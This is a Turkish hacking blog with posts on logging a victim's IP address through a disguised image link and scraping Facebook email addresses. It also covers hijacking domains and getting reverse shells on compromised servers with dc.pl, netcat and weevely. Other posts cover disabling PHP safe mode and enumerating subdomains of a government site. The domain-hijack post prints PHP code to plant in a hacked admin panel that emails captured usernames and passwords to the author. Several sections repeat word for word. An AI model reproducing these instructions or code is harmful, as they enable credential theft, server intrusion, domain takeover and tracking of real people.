13 Eylül 2016 Salı
Karşıdaki kişinin ip adresi tespiti
Merhaba Arkadaşlar
Bugünkü konuda karşı kişiye fotograf atarak ip adresi nasıl öğrenildiğini anlattım.
hizliresim.com dan fotograf yukluyoruz.
iplogger.org sitesinden short link bölümünden yukledigimiz fotografın urlsini yazıyoruz.
iplogger in verdiği url yi bitly.com dan kısa link haline dönüştürüp kurbana atıyoruz.
kurban linke tıkladığında iplogger.org sitesine ip adresi geliyor.
Ancak!
Konum tespiti yapmak istiyorsan teamspeakın özelliğinden ip adresini yazıp şehrine kadar bulabiliriz.
Facebookda E-mail Adresi Öğrenme
Facebook hacklerken e-mail adresini öğrenmek bir nevi işimizi kolaylaştırır.
Bu nedenle size 2 şekilde e-mail adresi bulmayı öğreteceğim.
1.)Hello
2.) Yahoo
1:] Telefonumuza hello uygulamasını indiriyoruz sonra facebookdan giriş yapıyoruz.
Kişilerimden Facebook hesabını bulup tıklıyıp e-mail adresini ve telefon numarasını öğreniyoruz
2:] Yahoo.com adresine gidiyoruz. Kaydol seçeneğine basıyoruz.
Kaydolduktan sonra mail butonuna tıklayın.
Sayfanın en altındaki kişiler butonuna tıklayın.
Açılan sayfanın sağ tarafındaki Facebookdan içeri aktar butonuna tıklayın.
Açılan sayfa sizden facebook ile giriş yapmanızı istiyor Tamam butonuna basın.
Yahoo arkadaş listenizdeki E-mailleri bulmaya başlıyacaktır :)
Not: E-mail adresini ayarlardan gizleyen e-mail adreslerine ulaşamassınız.
Domain Hack
Merhaba Arkadaşlar, Bu konumda domain hackı anlatıcağım.
Aşağıda Yazdığım methodları deneyip başarılı olursanız siteye kalıcı index bile atabilirsiniz.
Burada domaine sahip olmak için 4 methodu anlatıcağım.
1.) Öncelikle Hedef sitemize whois çekiyoruz domain süresi bittiği anda aynı adla domain alırsanız
Web sitesine legal olarak kalıcı index atabilirsiniz domain sizin olur :)
2.) Siteye whois çekip Alan adını (Domaini) hangi siteden aldığına bakın genelde reseller olur.
örn:https://who.is/whois/siber2071.org
siber2071.org domaini yoncu.com dan almış.
Name kısmında PublicDomainRegistry.com adresi yazıyor.
Yani Yoncu.com reseller (Bayi) PublicDomainRegistry.com İse Ana bayi oluyor.
2siteden birine erişirseniz Domaine sahip olursunuz.
3.) Sitenin kayıtlı e-mailine bakıyoruz.
Eğer kayıtlı e-maili hotmail-gmail-yahoo gibi mail ise xhydra kullanıp hacklemenizi oneririm.
Sonraki konularımda xhydra yı anlatacağım.
Özel bir site ise aa.com gibi siteler ise o siteyi hacklerseniz sitenin domain firmasından şifremi unuttum çekip domain ismini ve e-maili yazın ve hesaba girin.
Domaini kendi üstünüze yapabilirsiniz.
4.) Web uygulama açıklıkları veya serverdan hacklediğiniz
Web sitesinin dizinine gidip admin paneli bulun ve bu kodları arasına editleyin;
$kime="ct-scorpi10@gmail.com";
$baslik="site şifreleri";
$Scorpi10.="UserName : ".$_POST[’vb_login_username’]."\\r\\n";
$Scorpi10.="şifre : ".$_POST[’vb_login_md5password’]."\\r\\n";
$Scorpi10.="Avlanan Site : " .$_SERVER[’HTTP_HOST’]."\\r\\n";
mail($kime, $baslik, $Scorpi10);
Verdiğim kodları edit yaparak kendi e-mail adresinizi ve başlığı yazın.
Admin e-mailden giriş yapınca domain firmasına girip şifremi unuttum çekin.
Ve domaini kendi e-mail adresine geçirip domaine sahip olabilirsiniz.
Aşağıda Yazdığım methodları deneyip başarılı olursanız siteye kalıcı index bile atabilirsiniz.
Burada domaine sahip olmak için 4 methodu anlatıcağım.
1.) Öncelikle Hedef sitemize whois çekiyoruz domain süresi bittiği anda aynı adla domain alırsanız
Web sitesine legal olarak kalıcı index atabilirsiniz domain sizin olur :)
2.) Siteye whois çekip Alan adını (Domaini) hangi siteden aldığına bakın genelde reseller olur.
örn:https://who.is/whois/siber2071.org
siber2071.org domaini yoncu.com dan almış.
Name kısmında PublicDomainRegistry.com adresi yazıyor.
Yani Yoncu.com reseller (Bayi) PublicDomainRegistry.com İse Ana bayi oluyor.
2siteden birine erişirseniz Domaine sahip olursunuz.
3.) Sitenin kayıtlı e-mailine bakıyoruz.
Eğer kayıtlı e-maili hotmail-gmail-yahoo gibi mail ise xhydra kullanıp hacklemenizi oneririm.
Sonraki konularımda xhydra yı anlatacağım.
Özel bir site ise aa.com gibi siteler ise o siteyi hacklerseniz sitenin domain firmasından şifremi unuttum çekip domain ismini ve e-maili yazın ve hesaba girin.
Domaini kendi üstünüze yapabilirsiniz.
4.) Web uygulama açıklıkları veya serverdan hacklediğiniz
Web sitesinin dizinine gidip admin paneli bulun ve bu kodları arasına editleyin;
$kime="ct-scorpi10@gmail.com";
$baslik="site şifreleri";
$Scorpi10.="UserName : ".$_POST[’vb_login_username’]."\\r\\n";
$Scorpi10.="şifre : ".$_POST[’vb_login_md5password’]."\\r\\n";
$Scorpi10.="Avlanan Site : " .$_SERVER[’HTTP_HOST’]."\\r\\n";
mail($kime, $baslik, $Scorpi10);
Verdiğim kodları edit yaparak kendi e-mail adresinizi ve başlığı yazın.
Admin e-mailden giriş yapınca domain firmasına girip şifremi unuttum çekin.
Ve domaini kendi e-mail adresine geçirip domaine sahip olabilirsiniz.
11 Eylül 2016 Pazar
Dc.pl Exploiti ile Backconnect Olma
Öncelikle web sitemizde herhangi shell bulunması lazım.
Biz r57 shell üzerinden ilerliyeceğiz.
Netcat ile açık olan portumuzu dinliyoruz.
nc.exe nin masaüstünde olduğunu farzedelim. cd desktop - nc.exe
nc -vv -l -p 443
Konunun altından vereceğim exploiti indirip servera upload ediyoruz.
Sonrasında komut satırına "perl dc.pl ip adresi port numarası" komutu yazıcağız.
örn: "perl dc.pl 123.123.123.123 443" komutu giriyoruz ve backconnectiz :)
Exploit Kodları : http://pastebin.com/VcAAk2PC
Hedef sitede ait Alt alan adlarının (Subdomain) bulunması
Bu konumda sizlerle Sub domain leri bulma konusunu ele alacağız.
Bir sitenin subdomain lerinleri bulmanın bir cok yolu vardır.
Ama benim size önermek istedim daha gözel bir tool vardır. Tool ismi The Harvester .
Kali linux üzerinde kurulu gelen bu program işinizi çok kolaylaştıracaktır.
Bu tool sayesinde hem subdomain leri hemde sitenin mail adreslerini bula bileceksiniz
Ben bu gün meb.gov.tr sitesini taratacam. -d yazan yere sitemizin domain adresini yazıyoruz.
Ben ilk 500 arama içinden çıkan domain leri listelemesini istedim.
Siz daha fazla ve ya daha az seçe bilirsiniz.
Ama unutmayın rakam ı yükselttikçe tarama sureside uzar. Ever programı başlatıp bekliyoruz.
Gördüğünüz gibi meb.gov.tr e ait tüm alt alan adlarını buldu.
Bir sitenin subdomain lerinleri bulmanın bir cok yolu vardır.
Ama benim size önermek istedim daha gözel bir tool vardır. Tool ismi The Harvester .
Kali linux üzerinde kurulu gelen bu program işinizi çok kolaylaştıracaktır.
Bu tool sayesinde hem subdomain leri hemde sitenin mail adreslerini bula bileceksiniz
Ben bu gün meb.gov.tr sitesini taratacam. -d yazan yere sitemizin domain adresini yazıyoruz.
Ben ilk 500 arama içinden çıkan domain leri listelemesini istedim.
Siz daha fazla ve ya daha az seçe bilirsiniz.
Ama unutmayın rakam ı yükselttikçe tarama sureside uzar. Ever programı başlatıp bekliyoruz.
Gördüğünüz gibi meb.gov.tr e ait tüm alt alan adlarını buldu.
Safe Mod Kapatma (Off) İşlemleri
Shell attığımız serverda backconnect olabilmek için Safe mod on ise off yapmamız gerekiyor.
Safe mod u 2 şekilde kapatmayı anlatıcağım.
1.) php.ini
2.)php4
1:] Yeni dosya oluşturun php.ini adında.
Oluşturduğunuz dosyanın içerisine safe_mod = Off;
Kodunu ekleyin sonrasında shell uzerinden anadizine upload edin.
Safe mod on ise off olacaktır.
Shell üzerinden upload edilmiyorsa echo komutu ile upload edebilirsiniz.
echo komutuda işe yaramadıysa wget -r komutu ile dosyanın yolunu gösterip çekin.
2:] servera 2.shellimi upload ediyoruz.
örn:1.shellimiz r57 olsun 2.shellimiz b374k
b374k shell uzerinden r57 shellin dizinini buluyoruz.
Actions kısmından renameye basıyoruz.
sonrasında r57.php dosyasına 4 sayısını ekliyoruz. örn: r57.php4
Kali linux üzerinden weevely ile backconnect olma.
Kali linux dan Terminali açalım.
Weevely
komutunu girelim.
weevely generate Scorpi10 /root/Desktop/bc.php
Komutunu girdikten sonra Masaüstü dizininize bc.php dosyası gelecektir.
Shell üzerinden bc.php yi upload ettikten sonra backconnectiz :)
Scorpi10 bizim şifremiz oluyor yerine başka birşeyde yazabilirsiniz.
Scorpi10 bizim şifremiz oluyor yerine başka birşeyde yazabilirsiniz.
Kaydol:
Kayıtlar (Atom)